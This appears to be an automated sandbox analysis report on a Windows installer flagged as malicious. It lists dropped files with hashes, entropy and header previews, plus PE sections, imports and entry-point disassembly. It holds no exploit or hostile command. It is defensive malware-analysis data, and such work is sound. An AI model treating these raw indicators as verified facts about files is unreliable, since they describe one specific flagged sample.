                                                                                  SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                  Malicious:false
                                                                                  Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1825
                                                                                  Entropy (8bit):5.088030483893024
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                  MD5:992C00BEAB194CE392117BB419F53051
                                                                                  SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                  SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                  SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                  Malicious:false
                                                                                  Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):714526
                                                                                  Entropy (8bit):6.5053900039496435
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                  MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                  SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                  SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                  SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:InnoSetup Log CRTGame, version 0x30, 8021 bytes, 124406\user, "C:\Program Files (x86)\CRTGame"
                                                                                  Category:dropped
                                                                                  Size (bytes):8021
                                                                                  Entropy (8bit):5.0517778119094086
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/3N8WVPpHLbK+T4hlOIhlXWx4cVSQs0Ln9qE2VYW4W:/98WVPpHF+QIhs+cVSQ1n8mQ
                                                                                  MD5:C9949727FA8DCF2D9AFD4D4B32FFD6CB
                                                                                  SHA1:42F6918388A430ADBE51459E332C1E89150E9241
                                                                                  SHA-256:061499CAD7FC7E0669C93B1A3162F71A52D077DFCF89F622BB7891677B5CA62A
                                                                                  SHA-512:D1B609B2C5C0FE8DD88E6477DB80382D40EBD48C91BF0E2460F707D6F69D32E6B8C4ECABD560D0EF30EDB82A06F76DB375D454E62FA4F3EA46E663F030E3B80F
                                                                                  Malicious:false
                                                                                  Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...U...%................................................................................................................Q.>.................?....124406.user.C:\Program Files (x86)\CRTGame.................. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMet
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):714526
                                                                                  Entropy (8bit):6.5053900039496435
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                  MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                  SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                  SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                  SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                  Malicious:false
                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2207670
                                                                                  Entropy (8bit):6.40492801249664
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:WgUuC+Q/Wk0q61pnaabTniY7A5YVoZgMOuBKWqk05myavB1W1oxYxixrJu+cTjX7:WgYx+dzPawTf7Fv+KlzP+VuUkD
                                                                                  MD5:3362BAC458070E33D0CABCDA1E4B735C
                                                                                  SHA1:76AC1F5B96667D9621EEDD92AB0704B9C7A129B0
                                                                                  SHA-256:4DBFD9DF16A57D8FF7A00A378FE737EFC179F53F2CE975DAEAEDBAA6AB8BCECD
                                                                                  SHA-512:59ED8A9D16E100AD91D98AD3A08EABE148234633E59BFB4BEF1B63E5A54C3E63193F088AD1538C4898A7A6AC5EAD65A2E244AE64BC5325BBF87E763474C5A5CE
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L....ue.................`...................p....@...........................!......."......................................y..P........G...........................................................................p...............................text....[.......`.................. ..`.rdata.......p... ...p..............@..@.data....P.......0..................@....rsrc....G.......P..................@..@.hsave.......@......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):0.8112781244591328
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:1ln:v
                                                                                  MD5:34F45818F16D1BBB62BA5874B8814CC7
                                                                                  SHA1:A454CA483B4A66B83826D061BE2859DD79FF0D6C
                                                                                  SHA-256:DC765660B06EE03DD16FD7CA5B957E8C805161AC2C4AF28C5A100AB2AB432CA1
                                                                                  SHA-512:65711C8D556639DDFC14CE292B2415F3A2824D003AF1A530093B8E0B70B695E6C639694B7B90C6750B1129566D9A3784ED274667988D4B227DB2AC9B6CF7548B
                                                                                  Malicious:false
                                                                                  Preview:....
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):128
                                                                                  Entropy (8bit):2.862976125752538
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                                  MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                                  SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                                  SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                                  SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                                  Malicious:false
                                                                                  Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                                  Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                  File Type:ISO-8859 text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8
                                                                                  Entropy (8bit):2.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:1Clt:I
                                                                                  MD5:66525B08BFDE09653EAFF883D4B3BC40
                                                                                  SHA1:F6DB827691CA8AC78C1AF344F41E5E328532CFE2
                                                                                  SHA-256:FAE1834F590D06296EA76379433C1CF85AF89133D13636ABAB0114200A9AF58A
                                                                                  SHA-512:CD951A0E89A0B3899D68684D281B658369CE7A327855EBDE32C6E8B5303CB3229E8411F0634D367505465973D9F3D1204401E05E2F0D6BEEFA2A85C5555D2C23
                                                                                  Malicious:false
                                                                                  Preview:.e]g....
                                                                                  Process:C:\Users\user\Desktop\AGcC2uK0El.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):704000
                                                                                  Entropy (8bit):6.4972640482038075
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                                  MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                  SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                                  SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                                  SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                                  Malicious:true
                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):4.026670007889822
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                  MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                  SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                  SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                  SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2560
                                                                                  Entropy (8bit):2.8818118453929262
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                  MD5:A69559718AB506675E907FE49DEB71E9
                                                                                  SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                  SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                  SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):19456
                                                                                  Entropy (8bit):5.8975201046735535
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                                  MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                                  SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                                  SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                                  SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):6144
                                                                                  Entropy (8bit):4.215994423157539
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                  MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                  SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                  SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                  SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23312
                                                                                  Entropy (8bit):4.596242908851566
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                  MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                  SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                  SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                  SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.999439818720794
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  File name:AGcC2uK0El.exe
                                                                                  File size:7'280'524 bytes
                                                                                  MD5:3ec3e60970e2d0d38df3b5e571e8514d
                                                                                  SHA1:e2c9975f6fda0cbbfaa434e25b6645450cb926ea
                                                                                  SHA256:113106967e66077d88c8cf6dae8170d74479b3c4f7a2fc284719eb39cef28ce8
                                                                                  SHA512:55df7ef052fc553de96dc5b83cc3d36388ef653dad3471ed007febd851b692c4528a3fd3c4da0dbdd483fa1d292b80deb867f1e6e2ce21878bd1701d845847a3
                                                                                  SSDEEP:196608:FxnTNzjsOzc7TGHscDgcXbIdslX38dgFYJzj:7NztzQlcDPXus98d9Jzj
                                                                                  TLSH:AB7633A3AA51E2B2C140CDFC2DA3C058D25739239E248E6E254EA5DEE77E751180FF71
                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                  Entrypoint:0x409c40
                                                                                  Entrypoint Section:CODE
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x65765E5F [Mon Dec 11 00:57:03 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:1
                                                                                  OS Version Minor:0
                                                                                  File Version Major:1
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:1
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  add esp, FFFFFFC4h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  xor eax, eax
                                                                                  mov dword ptr [ebp-10h], eax
                                                                                  mov dword ptr [ebp-24h], eax
                                                                                  call 00007FB898D761ABh
                                                                                  call 00007FB898D773B2h
                                                                                  call 00007FB898D77641h
                                                                                  call 00007FB898D79678h
                                                                                  call 00007FB898D796BFh
                                                                                  call 00007FB898D7BFEEh
                                                                                  call 00007FB898D7C155h
                                                                                  xor eax, eax
                                                                                  push ebp
                                                                                  push 0040A2FCh
                                                                                  push dword ptr fs:[eax]
                                                                                  mov dword ptr fs:[eax], esp
                                                                                  xor edx, edx
                                                                                  push ebp
                                                                                  push 0040A2C5h
                                                                                  push dword ptr fs:[edx]
                                                                                  mov dword ptr fs:[edx], esp
                                                                                  mov eax, dword ptr [0040C014h]
                                                                                  call 00007FB898D7CBBBh
                                                                                  call 00007FB898D7C7EEh
                                                                                  lea edx, dword ptr [ebp-10h]
                                                                                  xor eax, eax
                                                                                  call 00007FB898D79CA8h
                                                                                  mov edx, dword ptr [ebp-10h]
                                                                                  mov eax, 0040CDE8h
                                                                                  call 00007FB898D76257h
                                                                                  push 00000002h
                                                                                  push 00000000h
                                                                                  push 00000001h
                                                                                  mov ecx, dword ptr [0040CDE8h]
                                                                                  mov dl, 01h
                                                                                  mov eax, 0040738Ch
                                                                                  call 00007FB898D7A537h
                                                                                  mov dword ptr [0040CDECh], eax
                                                                                  xor edx, edx
                                                                                  push ebp
                                                                                  push 0040A27Dh
                                                                                  push dword ptr fs:[edx]
                                                                                  mov dword ptr fs:[edx], esp
                                                                                  call 00007FB898D7CC2Bh
                                                                                  mov dword ptr [0040CDF4h], eax
                                                                                  mov eax, dword ptr [0040CDF4h]
                                                                                  cmp dword ptr [eax+0Ch], 01h
                                                                                  jne 00007FB898D7CD6Ah
                                                                                  mov eax, dword ptr [0040CDF4h]
                                                                                  mov edx, 00000028h
                                                                                  call 00007FB898D7A938h
                                                                                  mov edx, dword ptr [000000F4h]
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  CODE0x10000x93640x94000d7ac17dafcd52a9b3ea353c32256c1dFalse0.6148648648648649data6.56223225792919IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  DATA0xb0000x24c0x40045829356498700390b8c7afa10ea05a4False0.31640625data2.7585022150416294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  BSS0xc0000xe4c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x110000x2c000x2c0043577978bf2d75a61193942dc91f8094False0.32262073863636365data4.461255394707395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                  RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                  RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                  RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                  RT_STRING0x125740x2f2data0.35543766578249336
                                                                                  RT_STRING0x128680x30cdata0.3871794871794872
                                                                                  RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                  RT_STRING0x12e440x68data0.75
                                                                                  RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                  RT_STRING0x12f600xaedata0.5344827586206896
                                                                                  RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                  RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                  RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27483443708609273
                                                                                  RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                                                  DLLImport
                                                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                  user32.dllMessageBoxA
                                                                                  oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                  kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                  user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
